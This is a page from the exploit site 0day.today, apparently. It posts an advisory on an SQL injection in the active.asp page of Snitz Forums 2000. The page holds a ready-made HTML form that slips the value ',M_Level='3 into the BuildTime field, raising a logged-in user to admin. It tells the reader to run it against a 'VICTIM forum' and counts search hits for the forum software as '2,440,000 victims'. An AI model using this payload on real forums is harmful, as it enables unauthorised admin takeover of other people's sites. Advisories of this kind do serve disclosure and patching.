0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Snitz Forums 2000 Active.asp Remote SQL Injection Vulnerability
=============================================================== Snitz Forums 2000 Active.asp Remote SQL Injection Vulnerability =============================================================== ################################################################### # # AmnPardaz Security Research & Penetration Testing Group # # Title: A user can gain admin level in snitz 2000 by SQL Injection # vendor: http://forum.snitz.com/ # Googling: "Powered by Snitz" > 2,440,000 victims # Last bug report in 2007-02-16 with 4692 visitors # Exploit: Available # Fix Available: Update to last version. ######################## Bug Description ########################### A user can gain admin level in the forum and can access to the forum. It is because of a SQL Injection in "Active.asp" After login to your VICTIM forum, execute below script ~~~~~~~~~~~Start HTML Exploit~~~~~~~~~ <form action="http://[VICTIM URL]/active.asp" method="post"> Query: <input type="text" name="BuildTime" value="',M_Level='3" /><br /> DefaultValues: <input type="text" name="AllRead" value="Y" /><br /> Submit: <input type="submit" name="submit" value="Submit" /><br /> </form> ~~~~~~~~~~~End HTML Exploit~~~~~~~~~ ##################################################################### # Country: Iran # Credit: Soroush Dalili found this bug. ##################################################################### # 0day.today [2024-11-15] #